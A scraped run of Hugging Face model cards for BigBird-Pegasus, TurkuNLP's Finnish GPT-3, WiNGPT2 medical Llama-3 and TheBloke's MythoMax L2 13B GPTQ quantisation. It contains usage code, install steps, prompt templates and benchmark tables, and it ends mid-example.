BigBird is a sparse-attention-based transformer that extends Transformer-based models, such as BERT, to much longer sequences. Moreover, BigBird comes with a theoretical understanding of the capabilities of a complete transformer that the sparse model can handle.
BigBird was introduced in this [paper](https://arxiv.org/abs/2007.14062) and first released in this [repository](https://github.com/google-research/bigbird).
Disclaimer: The team releasing BigBird did not write a model card for this model so this model card has been written by the Hugging Face team.
## Model description
BigBird relies on **block sparse attention** instead of normal attention (i.e. BERT's attention) and can handle sequences up to a length of 4096 at a much lower compute cost compared to BERT. It has achieved SOTA on various tasks involving very long sequences, such as long-document summarization and question answering with long contexts.
## How to use
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import BigBirdPegasusForConditionalGeneration, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("google/bigbird-pegasus-large-bigpatent")
# by default encoder-attention is `block_sparse` with num_random_blocks=3, block_size=64
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent")
# decoder attention type can't be changed & will be "original_full"
# you can change `attention_type` (encoder only) to full attention like this:
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent", attention_type="original_full")
# you can change `block_size` & `num_random_blocks` like this:
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent", block_size=16, num_random_blocks=2)
text = "Replace me by any text you'd like."
inputs = tokenizer(text, return_tensors='pt')
prediction = model.generate(**inputs)
prediction = tokenizer.batch_decode(prediction)
```
## Training Procedure
This checkpoint is obtained after fine-tuning `BigBirdPegasusForConditionalGeneration` for **summarization** on [big_patent](https://huggingface.co/datasets/big_patent) dataset.
## BibTeX entry and citation info
```tex
@misc{zaheer2021big,
title={Big Bird: Transformers for Longer Sequences},
author={Manzil Zaheer and Guru Guruganesh and Avinava Dubey and Joshua Ainslie and Chris Alberti and Santiago Ontanon and Philip Pham and Anirudh Ravula and Qifan Wang and Li Yang and Amr Ahmed},
year={2021},
eprint={2007.14062},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
|
TurkuNLP/gpt3-finnish-small | TurkuNLP | "2023-06-27T06:48:35Z" | 3,610 | 10 | transformers | [
"transformers",
"pytorch",
"bloom",
"feature-extraction",
"text-generation",
"fi",
"arxiv:2203.02155",
"license:apache-2.0",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-02-15T10:08:16Z" | ---
language:
- fi
pipeline_tag: text-generation
license: apache-2.0
---
A generative pretrained transformer with 186M parameters for Finnish.
The TurkuNLP Finnish GPT-3 models are a family of pretrained monolingual GPT-style language models based on the BLOOM architecture.
Note that the models are pure language models, meaning that they are not [instruction finetuned](https://arxiv.org/abs/2203.02155) for dialogue
or answering questions.
These models are intended to be used as foundational models that can be e.g. instruction finetuned to serve as modern chat-models.
All models are trained for 300B tokens.
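A hedged example of loading the small checkpoint with `transformers` for plain text completion (these are base models, not chat models; the Finnish prompt and sampling settings are arbitrary):
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = "TurkuNLP/gpt3-finnish-small"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)  # BLOOM-architecture checkpoint

inputs = tokenizer("Suomen pääkaupunki on", return_tensors="pt")
outputs = model.generate(**inputs, max_new_tokens=20, do_sample=True, temperature=0.7)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```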
**Parameters**
| Model | Layers | Dim | Heads | Params |
|--------|--------|------|-------|--------|
| Small | 12 | 768 | 12 | 186M |
| Medium | 24 | 1024 | 16 | 437M |
| Large | 24 | 1536 | 16 | 881M |
| XL | 24 | 2064 | 24 | 1.5B |
| ”3B” | 32 | 2560 | 32 | 2.8B |
| ”8B” | 32 | 4096 | 32 | 7.5B |
| "13B" | 40 | 5120 | 40 | 13.3B |
**Datasets**
We used a combination of multiple Finnish resources.
* Finnish Internet Parsebank https://turkunlp.org/finnish_nlp.html
* mC4 multilingual colossal, cleaned Common Crawl https://huggingface.co/datasets/mc4
* Common Crawl Finnish https://TODO
* Finnish Wikipedia https://fi.wikipedia.org/wiki
* Lönnrot Projekti Lönnrot http://www.lonnrot.net/
* ePub National library ”epub” collection
* National library ”lehdet” collection
* Suomi24 The Suomi 24 Corpus 2001-2020 http://urn.fi/urn:nbn:fi:lb-2021101527
* Reddit r/Suomi submissions and comments https://www.reddit.com/r/Suomi
* STT Finnish News Agency Archive 1992-2018 http://urn.fi/urn:nbn:fi:lb-2019041501
* Yle Finnish News Archive 2011-2018 http://urn.fi/urn:nbn:fi:lb-2017070501
* Yle Finnish News Archive 2019-2020 http://urn.fi/urn:nbn:fi:lb-2021050401
* Yle News Archive Easy-to-read Finnish 2011-2018 http://urn.fi/urn:nbn:fi:lb-2019050901
* Yle News Archive Easy-to-read Finnish 2019-2020 http://urn.fi/urn:nbn:fi:lb-2021050701
* ROOTS TODO
**Sampling ratios**
|Dataset | Chars | Ratio | Weight | W.Ratio |
|----------|--------|---------|--------|---------|
|Parsebank | 35.0B | 16.9\% | 1.5 | 22.7\%|
|mC4-Fi | 46.3B | 22.4\% | 1.0 | 20.0\%|
|CC-Fi | 79.6B | 38.5\% | 1.0 | 34.4\%|
|Fiwiki | 0.8B | 0.4\% | 3.0 | 1.0\%|
|Lönnrot | 0.8B | 0.4\% | 3.0 | 1.0\%|
|Yle | 1.6B | 0.8\% | 2.0 | 1.4\%|
|STT | 2.2B | 1.1\% | 2.0 | 1.9\%|
|ePub | 13.5B | 6.5\% | 1.0 | 5.8\%|
|Lehdet | 5.8B | 2.8\% | 1.0 | 2.5\%|
|Suomi24 | 20.6B | 9.9\% | 1.0 | 8.9\%|
|Reddit-Fi | 0.7B | 0.4\% | 1.0 | 0.3\%|
|**TOTAL** | **207.0B** | **100.0\%** | **N/A** | **100.0\%** |
More documentation and a paper coming soon. |
winninghealth/WiNGPT2-Llama-3-8B-Base | winninghealth | "2024-04-25T05:48:01Z" | 3,610 | 4 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"medical",
"en",
"zh",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-04-23T05:37:50Z" | ---
language:
- en
- zh
tags:
- medical
license: apache-2.0
---
## WiNGPT2
[WiNGPT](https://github.com/winninghealth/WiNGPT2) is a GPT-based large language model for the medical domain. It aims to integrate professional medical knowledge, healthcare information and data, providing the healthcare industry with intelligent services such as medical question answering, diagnostic support, and medical knowledge, to improve the efficiency of diagnosis and treatment and the quality of medical services.
## Changelog
[2024/04/23] Added the WiNGPT2-Llama-3-8B-Base model (Chinese-enhanced / multilingual) and its evaluation results
[2024/04/01] Updated the WiNEval evaluation results
[2024/03/05] Open-sourced the 7B/14B-Chat 4-bit model weights: [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Chat-AWQ)WiNGPT2-7B-Chat-4bit and [🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Chat-AWQ)WiNGPT2-14B-Chat-4bit.
[2023/12/20] Added a QR code for the user WeChat group, valid until December 27; scan it to join.
[2023/12/18] Published the results of WiNEval-MCKQuiz, the Winning Health medical model evaluation scheme.
[2023/12/12] Open-sourced the WiNGPT2 14B model weights: [🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Base)WiNGPT2-14B-Base and [🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Chat)WiNGPT2-14B-Chat.
[2023/11/02] [34B model platform test](https://wingpt.winning.com.cn/) and [join the WeChat discussion group](https://github.com/winninghealth/WiNGPT2/blob/main/assets/WiNGPT_GROUP.JPG)
[2023/10/13] Added a simple [Chatbot example](#部署) that supports basic multi-turn conversation.
[2023/09/26] Open-sourced WiNGPT2 and the 7B model weights: [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Base)WiNGPT2-7B-Base and [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Chat)WiNGPT2-7B-Chat.
## How to use
### Inference
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "WiNGPT-Llama-3-8B-Chat"
device = "cuda"
tokenizer = AutoTokenizer.from_pretrained(model_path)
model = AutoModelForCausalLM.from_pretrained(model_path).to(device)
model = model.eval()
text = 'User:WiNGPT, 你好<|end_of_text|>\n Assistant:'
inputs = tokenizer.encode(text, return_tensors="pt").to(device)
outputs = model.generate(inputs, repetition_penalty=1.1, max_new_tokens=1024)
response = tokenizer.decode(outputs[0])
print(response)
## Example output: 你好!今天我能为你做些什么?<|end_of_text|>
```
### Prompt
WiNGPT-Llama-3-8B-Chat uses a custom prompt format:
Roles: System/User/Assistant
chat_template:
```jinja2
"{% for message in messages %}{% if message['role'] == 'system' %}System:{% endif %}{% if message['role'] == 'user' %}User:{% endif %}{% if message['role'] == 'assistant' %}Assistant:{% endif %}{{ message['content'] }}<|end_of_text|>\n {% endfor %}Assistant:"
```
**Instruction prompt** example:
```
User:WiNGPT, 你好<|end_of_text|>\n Assistant:
```
**Multi-turn dialogue** example:
```
User:WiNGPT, 你好<|end_of_text|>\n Assistant:你好!今天我能为你做些什么?<|end_of_text|>\n User:你是谁?<|end_of_text|>\n Assistant:
```
**Translation** example:
```
System:作为医疗领域的智能助手,WiNGPT将提供中英翻译服务。用户输入的中文或英文内容将由WiNGPT进行准确的翻译,以满足用户的语言需求。<|end_of_text|>\n User:Life is short, you know, and time is so swift; Rivers are wide, so wide, and ships sail far.<|end_of_text|>\n Assistant:
```
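Since the chat_template above ships with the tokenizer, the same strings can be produced programmatically; a rough sketch (assuming a local copy of the Chat checkpoint, as in the inference example above, and that its tokenizer config contains this template):
```python
from transformers import AutoTokenizer

tokenizer = AutoTokenizer.from_pretrained("WiNGPT-Llama-3-8B-Chat")

messages = [{"role": "user", "content": "WiNGPT, 你好"}]
# The custom template always appends a trailing "Assistant:" for generation
prompt = tokenizer.apply_chat_template(messages, tokenize=False)
print(prompt)
```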
## Model card
#### Training configuration and parameters
| Name | Training strategy | Length | Precision | Learning rate | Weight_decay | Epochs | GPUs |
| ----------------------- | ------------------ | ---- | ---- | ------ | ------------ | ------ | ------ |
| WiNGPT2-Llama-3-8B-Base | Continued pre-training (20G) | 8192 | bf16 | 5e-5 | 0.05 | 2 | A100*8 |
| WiNGPT2-Llama-3-8B-Chat | Fine-tuning/alignment (500k samples) | 8192 | bf16 | 5e-6 | 0.01 | 4 | A100*8 |
#### Training data
About 20G of pre-training data and about 500k instruction fine-tuning/alignment samples; see the [details](https://github.com/winninghealth/WiNGPT2?tab=readme-ov-file#%E8%AE%AD%E7%BB%83%E6%95%B0%E6%8D%AE).
## Chinese medical evaluation - WiNEval
Last updated: 2024-04-23
| | Type | MCKQuiz | MSceQA |
| ----------------------------- | ---------------------- | ----------- | ----------- |
| **WiNGPT-Llama-3-8B-Base** | Continued Pre-training | 66.3 | / |
| Meta-Llama-3-8B | Pre-training | 37 | / |
| | | | |
| **WiNGPT-Llama-3-8B-Chat** | Finetuning/Alignment | 65.2 | 79.8 |
| Meta-Llama-3-8B-Instruct | Finetuning/Alignment | 49.8 | 76.3 |
| Meta-Llama-3-70B-Instruct-AWQ | Finetuning/Alignment | 73.5 | 78.6 |
| | | | |
*MCKQuiz (objective questions): 13,060 multiple-choice questions across 17 subject categories; the question and options are given as input, the model outputs an answer, and accuracy is computed against the reference answers.*
*MSceQA (subjective questions): scenario questions from fine-grained sub-domains, covering eight business scenarios with 17 first-level and 32 second-level categories. Human/model raters assess the answers for accuracy, relevance, consistency, completeness, and authority, and score the generated answers against reference answers.*
[Other WiNEval evaluation results](https://github.com/winninghealth/WiNGPT2?tab=readme-ov-file#2-%E5%8D%AB%E5%AE%81%E5%81%A5%E5%BA%B7%E5%8C%BB%E7%96%97%E6%A8%A1%E5%9E%8B%E6%B5%8B%E8%AF%84%E6%96%B9%E6%A1%88-winevalzero-shot)
### Enterprise services
[Apply for a key via the WiNGPT test platform or contact us](https://wingpt.winning.com.cn/)
## Limitations and disclaimer
(a) WiNGPT2 is a large language model for the professional medical domain. It can provide general users with human-like AI doctor consultation and question answering, as well as general medical knowledge Q&A. For medical professionals, the answers WiNGPT2 gives regarding patient diagnosis, medication, and health advice are for reference only.
(b) You should understand that WiNGPT2 only provides information and suggestions and cannot replace the opinions, diagnosis, or treatment advice of medical professionals. Before acting on information from WiNGPT2, please seek advice from a doctor or other medical professional and independently evaluate the information provided.
(c) Information from WiNGPT2 may contain errors or inaccuracies. Winning Health makes no express or implied warranty regarding the accuracy, reliability, completeness, quality, safety, timeliness, performance, or fitness of WiNGPT2. The results and decisions arising from your use of WiNGPT2 are your own responsibility, and no liability is assumed for damage caused to you by third-party causes.
## License
1. This project is licensed under the Apache License 2.0. The model weights must also comply with the terms of the base model [Llama-3-8B](https://github.com/meta-llama/llama3) and its [license](https://llama.meta.com/llama3/license); see its website for details.
2. When using this project, including the model weights, please cite it: https://github.com/winninghealth/WiNGPT2
## Contact us
Website: https://www.winning.com.cn
Email: [email protected] |
hoschidude/sqlcoder-70-alpha-q4_k_m.gguf | hoschidude | "2024-06-20T09:22:10Z" | 3,610 | 1 | null | [
"gguf",
"region:us"
] | null | "2024-06-20T07:34:49Z" | Entry not found |
TheBloke/MythoMax-L2-13B-GPTQ | TheBloke | "2023-09-27T12:45:40Z" | 3,609 | 166 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"base_model:Gryphe/MythoMax-L2-13b",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"4-bit",
"gptq",
"region:us"
] | text-generation | "2023-08-11T07:27:24Z" | ---
language:
- en
license: other
model_name: MythoMax L2 13B
base_model: Gryphe/MythoMax-L2-13b
inference: false
model_creator: Gryphe
model_type: llama
prompt_template: '```
{system_message}
### Instruction:
{prompt}
(For roleplay purposes, I suggest the following - Write <CHAR NAME>''s next reply
in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.)
### Response:
```
'
quantized_by: TheBloke
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<img src="https://i.imgur.com/EBdldam.jpg" alt="TheBlokeAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</div>
<div style="display: flex; justify-content: space-between; width: 100%;">
<div style="display: flex; flex-direction: column; align-items: flex-start;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://discord.gg/theblokeai">Chat & support: TheBloke's Discord server</a></p>
</div>
<div style="display: flex; flex-direction: column; align-items: flex-end;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://www.patreon.com/TheBlokeAI">Want to contribute? TheBloke's Patreon page</a></p>
</div>
</div>
<div style="text-align:center; margin-top: 0em; margin-bottom: 0em"><p style="margin-top: 0.25em; margin-bottom: 0em;">TheBloke's LLM work is generously supported by a grant from <a href="https://a16z.com">andreessen horowitz (a16z)</a></p></div>
<hr style="margin-top: 1.0em; margin-bottom: 1.0em;">
<!-- header end -->
# MythoMax L2 13B - GPTQ
- Model creator: [Gryphe](https://huggingface.co/Gryphe)
- Original model: [MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b)
<!-- description start -->
## Description
This repo contains GPTQ model files for [Gryphe's MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b).
Multiple GPTQ parameter permutations are provided; see Provided Files below for details of the options provided, their parameters, and the software used to create them.
<!-- description end -->
<!-- repositories-available start -->
## Repositories available
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/MythoMax-L2-13B-AWQ)
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ)
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/MythoMax-L2-13B-GGUF)
* [Gryphe's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/Gryphe/MythoMax-L2-13b)
<!-- repositories-available end -->
<!-- prompt-template start -->
## Prompt template: Custom
```
{system_message}
### Instruction:
{prompt}
(For roleplay purposes, I suggest the following - Write <CHAR NAME>'s next reply in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.)
### Response:
```
<!-- prompt-template end -->
<!-- licensing start -->
## Licensing
The creator of the source model has listed its license as `other`, and this quantization has therefore used that same license.
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [Gryphe's MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b).
<!-- licensing end -->
<!-- README_GPTQ.md-provided-files start -->
## Provided files and GPTQ parameters
Multiple quantisation parameters are provided, to allow you to choose the best one for your hardware and requirements.
Each separate quant is in a different branch. See below for instructions on fetching from different branches.
All recent GPTQ files are made with AutoGPTQ, and all files in non-main branches are made with AutoGPTQ. Files in the `main` branch which were uploaded before August 2023 were made with GPTQ-for-LLaMa.
<details>
<summary>Explanation of GPTQ parameters</summary>
- Bits: The bit size of the quantised model.
- GS: GPTQ group size. Higher numbers use less VRAM, but have lower quantisation accuracy. "None" is the lowest possible value.
- Act Order: True or False. Also known as `desc_act`. True results in better quantisation accuracy. Some GPTQ clients have had issues with models that use Act Order plus Group Size, but this is generally resolved now.
- Damp %: A GPTQ parameter that affects how samples are processed for quantisation. 0.01 is default, but 0.1 results in slightly better accuracy.
- GPTQ dataset: The dataset used for quantisation. Using a dataset more appropriate to the model's training can improve quantisation accuracy. Note that the GPTQ dataset is not the same as the dataset used to train the model - please refer to the original model repo for details of the training dataset(s).
- Sequence Length: The length of the dataset sequences used for quantisation. Ideally this is the same as the model sequence length. For some very long sequence models (16+K), a lower sequence length may have to be used. Note that a lower sequence length does not limit the sequence length of the quantised model. It only impacts the quantisation accuracy on longer inference sequences.
- ExLlama Compatibility: Whether this file can be loaded with ExLlama, which currently only supports Llama models in 4-bit.
</details>
| Branch | Bits | GS | Act Order | Damp % | GPTQ Dataset | Seq Len | Size | ExLlama | Desc |
| ------ | ---- | -- | --------- | ------ | ------------ | ------- | ---- | ------- | ---- |
| [main](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/main) | 4 | 128 | No | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.26 GB | Yes | 4-bit, without Act Order and group size 128g. |
| [gptq-4bit-32g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-32g-actorder_True) | 4 | 32 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 8.00 GB | Yes | 4-bit, with Act Order and group size 32g. Gives highest possible inference quality, with maximum VRAM usage. |
| [gptq-4bit-64g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-64g-actorder_True) | 4 | 64 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.51 GB | Yes | 4-bit, with Act Order and group size 64g. Uses less VRAM than 32g, but with slightly lower accuracy. |
| [gptq-4bit-128g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-4bit-128g-actorder_True) | 4 | 128 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 7.26 GB | Yes | 4-bit, with Act Order and group size 128g. Uses even less VRAM than 64g, but with slightly lower accuracy. |
| [gptq-8bit--1g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-8bit--1g-actorder_True) | 8 | None | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 13.36 GB | No | 8-bit, with Act Order. No group size, to lower VRAM requirements. |
| [gptq-8bit-128g-actorder_True](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ/tree/gptq-8bit-128g-actorder_True) | 8 | 128 | Yes | 0.1 | [wikitext](https://huggingface.co/datasets/wikitext/viewer/wikitext-2-v1/test) | 4096 | 13.65 GB | No | 8-bit, with group size 128g for higher inference quality and with Act Order for even higher accuracy. |
<!-- README_GPTQ.md-provided-files end -->
<!-- README_GPTQ.md-download-from-branches start -->
## How to download from branches
- In text-generation-webui, you can add `:branch` to the end of the download name, eg `TheBloke/MythoMax-L2-13B-GPTQ:main`
- With Git, you can clone a branch with:
```
git clone --single-branch --branch main https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ
```
- In Python Transformers code, the branch is the `revision` parameter; see below.
<!-- README_GPTQ.md-download-from-branches end -->
<!-- README_GPTQ.md-text-generation-webui start -->
## How to easily download and use this model in [text-generation-webui](https://github.com/oobabooga/text-generation-webui).
Please make sure you're using the latest version of [text-generation-webui](https://github.com/oobabooga/text-generation-webui).
It is strongly recommended to use the text-generation-webui one-click-installers unless you're sure you know how to make a manual install.
1. Click the **Model tab**.
2. Under **Download custom model or LoRA**, enter `TheBloke/MythoMax-L2-13B-GPTQ`.
- To download from a specific branch, enter for example `TheBloke/MythoMax-L2-13B-GPTQ:main`
- see Provided Files above for the list of branches for each option.
3. Click **Download**.
4. The model will start downloading. Once it's finished it will say "Done".
5. In the top left, click the refresh icon next to **Model**.
6. In the **Model** dropdown, choose the model you just downloaded: `MythoMax-L2-13B-GPTQ`
7. The model will automatically load, and is now ready for use!
8. If you want any custom settings, set them and then click **Save settings for this model** followed by **Reload the Model** in the top right.
* Note that you do not need to and should not set manual GPTQ parameters any more. These are set automatically from the file `quantize_config.json`.
9. Once you're ready, click the **Text Generation tab** and enter a prompt to get started!
<!-- README_GPTQ.md-text-generation-webui end -->
<!-- README_GPTQ.md-use-from-python start -->
## How to use this GPTQ model from Python code
### Install the necessary packages
Requires: Transformers 4.32.0 or later, Optimum 1.12.0 or later, and AutoGPTQ 0.4.2 or later.
```shell
pip3 install transformers>=4.32.0 optimum>=1.12.0
pip3 install auto-gptq --extra-index-url https://huggingface.github.io/autogptq-index/whl/cu118/ # Use cu117 if on CUDA 11.7
```
If you have problems installing AutoGPTQ using the pre-built wheels, install it from source instead:
```shell
pip3 uninstall -y auto-gptq
git clone https://github.com/PanQiWei/AutoGPTQ
cd AutoGPTQ
pip3 install .
```
### For CodeLlama models only: you must use Transformers 4.33.0 or later.
If 4.33.0 is not yet released when you read this, you will need to install Transformers from source:
```shell
pip3 uninstall -y transformers
pip3 install git+https://github.com/huggingface/transformers.git
```
### You can then use the following code
```python
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
model_name_or_path = "TheBloke/MythoMax-L2-13B-GPTQ"
# To use a different branch, change revision
# For example: revision="main"
model = AutoModelForCausalLM.from_pretrained(model_name_or_path,
device_map="auto",
trust_remote_code=False,
revision="main")
tokenizer = AutoTokenizer.from_pretrained(model_name_or_path, use_fast=True)
prompt = "Tell me about AI"
prompt_template=f'''Below is an instruction that describes a task. Write a response that appropriately completes the request.
### Instruction:
{prompt}
### Response:
'''
print("\n\n*** Generate:")
input_ids = tokenizer(prompt_template, return_tensors='pt').input_ids.cuda()
output = model.generate(inputs=input_ids, temperature=0.7, do_sample=True, top_p=0.95, top_k=40, max_new_tokens=512)
print(tokenizer.decode(output[0]))
# Inference can also be done using transformers' pipeline
print("*** Pipeline:")
pipe = pipeline(
"text-generation",
model=model,
tokenizer=tokenizer,
max_new_tokens=512,
do_sample=True,
temperature=0.7,
top_p=0.95,
top_k=40,
repetition_penalty=1.1
)
print(pipe(prompt_template)[0]['generated_text'])
```
<!-- README_GPTQ.md-use-from-python end -->
<!-- README_GPTQ.md-compatibility start -->
## Compatibility
The files provided are tested to work with AutoGPTQ, both via Transformers and using AutoGPTQ directly. They should also work with [Occ4m's GPTQ-for-LLaMa fork](https://github.com/0cc4m/KoboldAI).
[ExLlama](https://github.com/turboderp/exllama) is compatible with Llama models in 4-bit. Please see the Provided Files table above for per-file compatibility.
[Huggingface Text Generation Inference (TGI)](https://github.com/huggingface/text-generation-inference) is compatible with all GPTQ models.
<!-- README_GPTQ.md-compatibility end -->
<!-- footer start -->
<!-- 200823 -->
## Discord
For further support, and discussions on these models and AI in general, join us at:
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
## Thanks, and how to contribute
Thanks to the [chirper.ai](https://chirper.ai) team!
Thanks to Clay from [gpus.llm-utils.org](https://gpus.llm-utils.org)!
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
* Patreon: https://patreon.com/TheBlokeAI
* Ko-Fi: https://ko-fi.com/TheBlokeAI
**Special thanks to**: Aemon Algiz.
**Patreon special mentions**: Alicia Loh, Stephen Murray, K, Ajan Kanaga, RoA, Magnesian, Deo Leter, Olakabola, Eugene Pentland, zynix, Deep Realms, Raymond Fosdick, Elijah Stavena, Iucharbius, Erik Bjäreholt, Luis Javier Navarrete Lozano, Nicholas, theTransient, John Detwiler, alfie_i, knownsqashed, Mano Prime, Willem Michiel, Enrico Ros, LangChain4j, OG, Michael Dempsey, Pierre Kircher, Pedro Madruga, James Bentley, Thomas Belote, Luke @flexchar, Leonard Tan, Johann-Peter Hartmann, Illia Dulskyi, Fen Risland, Chadd, S_X, Jeff Scroggin, Ken Nordquist, Sean Connelly, Artur Olbinski, Swaroop Kallakuri, Jack West, Ai Maven, David Ziegler, Russ Johnson, transmissions 11, John Villwock, Alps Aficionado, Clay Pascal, Viktor Bowallius, Subspace Studios, Rainer Wilmers, Trenton Dambrowitz, vamX, Michael Levine, 준교 김, Brandon Frisco, Kalila, Trailburnt, Randy H, Talal Aujan, Nathan Dryer, Vadim, 阿明, ReadyPlayerEmma, Tiffany J. Kim, George Stoitzev, Spencer Kim, Jerry Meng, Gabriel Tamborski, Cory Kujawski, Jeffrey Morgan, Spiking Neurons AB, Edmond Seymore, Alexandros Triantafyllidis, Lone Striker, Cap'n Zoog, Nikolai Manek, danny, ya boyyy, Derek Yates, usrbinkat, Mandus, TL, Nathan LeClaire, subjectnull, Imad Khwaja, webtim, Raven Klaugh, Asp the Wyvern, Gabriel Puliatti, Caitlyn Gatomon, Joseph William Delisle, Jonathan Leane, Luke Pendergrass, SuperWojo, Sebastain Graf, Will Dee, Fred von Graf, Andrey, Dan Guido, Daniel P. Andersen, Nitin Borwankar, Elle, Vitor Caleffi, biorpg, jjj, NimbleBox.ai, Pieter, Matthew Berman, terasurfer, Michael Davis, Alex, Stanislav Ovsiannikov
Thank you to all my generous patrons and donaters!
And thank you again to a16z for their generous grant.
<!-- footer end -->
# Original model card: Gryphe's MythoMax L2 13B
An improved, potentially even perfected variant of MythoMix, my [MythoLogic-L2](https://huggingface.co/Gryphe/MythoLogic-L2-13b) and [Huginn](https://huggingface.co/The-Face-Of-Goonery/Huginn-13b-FP16) merge using a highly experimental tensor type merge technique. The main difference with MythoMix is that I allowed more of Huginn to intermingle with the single tensors located at the front and end of a model, resulting in increased coherency across the entire structure.
The script and the accompanying templates I used to produce both can [be found here](https://github.com/Gryphe/BlockMerge_Gradient/tree/main/YAML).
This model is proficient at both roleplaying and storywriting due to its unique nature.
Quantized models are available from TheBloke: [GGML](https://huggingface.co/TheBloke/MythoMax-L2-13B-GGML) - [GPTQ](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ) (You're the best!)
## Model details
The idea behind this merge is that each layer is composed of several tensors, which are in turn responsible for specific functions. Using MythoLogic-L2's robust understanding as its input and Huginn's extensive writing capability as its output seems to have resulted in a model that exceeds at both, confirming my theory. (More details to be released at a later time)
This type of merge cannot be illustrated with a simple diagram, as each of its 363 tensors had a unique ratio applied to it. As with my prior merges, gradients were part of these ratios to further fine-tune its behaviour.
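As an illustration only (not the actual BlockMerge_Gradient script linked above, which defines its own per-tensor ratios and YAML templates), here is a minimal PyTorch sketch of what a gradient-based per-tensor merge can look like; the `layer_index` helper and the specific ratio schedule are assumptions for the example:

```python
# Illustrative sketch only -- the real merge was done with the BlockMerge_Gradient
# script linked above, which uses its own per-tensor ratios and YAML templates.
import torch

def layer_index(name: str):
    # Hypothetical helper: pull the layer number out of a tensor name such as
    # "model.layers.17.self_attn.q_proj.weight"; returns None for non-layer tensors.
    for part in name.split("."):
        if part.isdigit():
            return int(part)
    return None

def merge_state_dicts(sd_a: dict, sd_b: dict, n_layers: int = 40) -> dict:
    merged = {}
    for name, tensor_a in sd_a.items():
        tensor_b = sd_b[name]
        idx = layer_index(name)
        # Assumed gradient: model B gets progressively more weight toward the output layers.
        ratio = 0.5 if idx is None else idx / max(n_layers - 1, 1)
        merged[name] = torch.lerp(tensor_a, tensor_b, ratio)
    return merged
```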
## Prompt Format
This model primarily uses Alpaca formatting, so for optimal model performance, use:
```
<System prompt/Character Card>
### Instruction:
Your instruction or question here.
For roleplay purposes, I suggest the following - Write <CHAR NAME>'s next reply in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.
### Response:
```
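As a quick illustration, a minimal Python sketch of assembling this prompt; the character card text and names below are placeholders:

```python
# Placeholder system prompt / character card and names -- substitute your own.
system_prompt = "You are Aria, a witty starship engineer."

def build_prompt(instruction: str) -> str:
    # Alpaca-style layout described above: system prompt, instruction, response header.
    return f"{system_prompt}\n\n### Instruction:\n{instruction}\n\n### Response:\n"

prompt = build_prompt(
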